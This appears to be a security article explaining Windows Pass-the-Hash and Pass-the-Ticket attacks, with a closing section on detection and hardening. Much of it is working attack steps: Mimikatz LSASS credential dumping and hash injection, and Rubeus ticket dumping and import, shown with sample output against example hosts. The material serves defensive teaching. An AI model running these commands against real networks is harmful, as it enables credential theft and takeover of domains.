In 2017, the NotPetya worm tore through corporate networks in hours — not by cracking passwords, but by reusing stolen NTLM hashes to move laterally without ever knowing a plaintext credential. That same technique, Pass-the-Hash (PtH), is still alive in 2026. Its Kerberos cousin, Pass-the-Ticket (PtT), is just as dangerous. Both exploit how Windows handles authentication, and both are trivially easy to execute once an attacker has local admin on a single machine.
Pass-the-Hash: Owning Machines With a Hash, Not a Password
NTLM authentication never actually requires your plaintext password. Windows hashes it and sends the hash as proof of identity. An attacker with that hash can impersonate you directly — no cracking required.
The classic tool here is Mimikatz. After compromising WORKSTATION-04 (192.0.2.44) and gaining local admin, an attacker dumps LSASS memory to pull cached hashes:
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 214893 (00000000:000347ad)
Session : Interactive from 1
User Name : jharrison
Domain : CORP
Logon Server : DC01
Logon Time : 7/4/2026 08:12:44
SID : S-1-5-21-3847261847-...
msv :
[00000003] Primary
* Username : jharrison
* Domain : CORP
* NTLM : a87f3a337d73085c45f9416be5787d86
* SHA1 : 2d2d2ef5e7e9c4d4e6a1b3f8c1234abc12345678
That NTLM hash for CORP\jharrison is the prize. If jharrison is a domain admin — or even a local admin on other boxes — the attacker now owns those machines too. No password needed.
Next, the attacker spawns a new process injected with that hash, pointing at a target server like FILESERVER-01 (192.0.2.10):
mimikatz # sekurlsa::pth /user:jharrison /domain:CORP
/ntlm:a87f3a337d73085c45f9416be5787d86
/run:cmd.exe
* user : jharrison
* domain : CORP
* program : cmd.exe
* NTLM : a87f3a337d73085c45f9416be5787d86
| PID 4872
| TID 4876
\_ SecureChannel between these processes
That new cmd.exe window runs as jharrison from a network authentication perspective. Type dir \\192.0.2.10\C$ and you’re browsing the C drive of the file server. From here an attacker drops a backdoor, exfiltrates data, or pivots deeper into the domain.
Pass-the-Ticket: Forging Kerberos Tickets to Impersonate Anyone
Kerberos replaced NTLM as the default Windows auth protocol — but it introduced its own problem. Kerberos tickets are cached in memory and are portable. Steal a ticket, use a ticket.
The go-to tool for PtT is Rubeus. On a compromised host, the attacker first lists current tickets to understand the environment:
C:\> Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x5e9a2
-----------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------
| 0x7f3c1 | jharrison @ CORP | krbtgt/CORP | 7/4/2026 |
| 0x7f3c1 | jharrison @ CORP | cifs/FILESERVER-01 | 7/4/2026 |
| 0x8a112 | svc_backup @ CORP | HOST/DC01.corp.local | 7/4/2026 |
-----------------------------------------------------------------
That svc_backup service account ticket for HOST/DC01 is interesting. Service accounts are frequently over-privileged and rarely monitored. The attacker dumps it and loads it into their own session:
C:\> Rubeus.exe dump /luid:0x8a112 /service:HOST/DC01 /nowrap
[*] Extracting ticket from LUID 0x8a112
[*] base64(ticket.kirbi):
doIFpDCCBaCgAwIBBaEDAgEWooIE...(truncated)...
C:\> Rubeus.exe ptt /ticket:doIFpDCCBaCgAwIBBaEDAgEWooIE...
[*] Action: Import Ticket
[+] Ticket successfully imported!
With that ticket loaded, the attacker authenticates to the domain controller as svc_backup — no password, no hash, just a stolen memory blob. If svc_backup has DCSync rights or local admin on DC01, game over for the domain.
The scarier variant is a Golden Ticket — a forged TGT built from the KRBTGT account hash. It grants domain-wide access for up to 10 years and survives password resets on every account except KRBTGT itself.
How Defenders Detect and Disrupt These Attacks
Both attacks leave traces if you know what to look for. PtH generates Event ID 4624 with Logon Type 3 and an NTLM authentication package — unusual for internal logins in a Kerberos-native domain. PtT abuse shows up as Event ID 4768 and 4769 anomalies: tickets requested from unexpected IPs or at odd hours.
Three controls cut the attack surface significantly:
- Enable Protected Users Security Group for all privileged accounts — it forces Kerberos, disables NTLM, and prevents credential caching.
- Deploy Credential Guard on Windows 11 endpoints to move LSA secrets into a virtualization-based isolated process Mimikatz can’t touch.
- Rotate KRBTGT twice after any suspected compromise — the first reset invalidates current tickets, the second clears the history.
Least privilege matters here too. If svc_backup only has rights to the backup share and nothing else, stealing its ticket is a dead end.
What To Do Now
Open your Active Directory and run this one query: pull every account in the Domain Admins group that is not in the Protected Users group. Those accounts are exposed to credential theft right now. Add them to Protected Users today — it takes 30 seconds per account and immediately disables NTLM authentication and credential caching for each one. That single change eliminates the most dangerous PtH and PtT paths in your environment.
